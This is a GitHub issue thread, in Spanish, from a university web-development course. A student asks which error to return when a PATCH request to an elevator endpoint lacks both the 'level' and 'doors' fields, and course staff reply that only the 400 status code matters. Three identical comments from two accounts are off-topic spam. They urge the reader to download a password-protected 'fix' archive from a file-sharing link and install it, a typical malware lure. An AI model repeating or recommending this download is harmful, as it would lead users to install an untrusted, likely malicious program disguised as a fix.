### ISSUE TITLE
Duda con error de PATCH /elevators/:elevator_id

### ISSUE THREAD

**Issue by Martinrsts** [IIC3103-2024-02/help#4]
Hola, 

Cuando se hace PATCH /elevators/:elevator_id son dos funciones distintas. Lo confirmaron acá también #2. Pero si son las mismas rutas y el request body es lo único que los diferencia. Entonces cuando no está ni el parámetro "level" ni el parámetro "doors", ¿Cuál es el error que se debe poner? Porque si se elige uno, el otro error nunca aparecerá:
![image](https://github.com/user-attachments/assets/c7b425f6-145a-4a2c-af94-ea62529b475b)
![image](https://github.com/user-attachments/assets/1daf51a4-0f29-4a33-9d05-79546e218e94)

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Francescorodriguezg** [comment]
Hola!

Con respecto a esta y otras issues cuyo tema son los mensajes de errores, solo debes preocuparte de que el código del error sea el adecuado, dado que el tester corrige esto último solamente.

Saludos

**Comment by mguzman20** [comment]
Pero cual de los dos mensajes es el adecuado?

**Comment by Francescorodriguezg** [comment]
No te preocupes por el mensaje. Solo asegúrate de que el código sea el adecuado (400)

**Comment by Mamunoz42** [comment]
Osea al final con lanzar un 400 en caso de que no venga ninguno estaría bien o no?
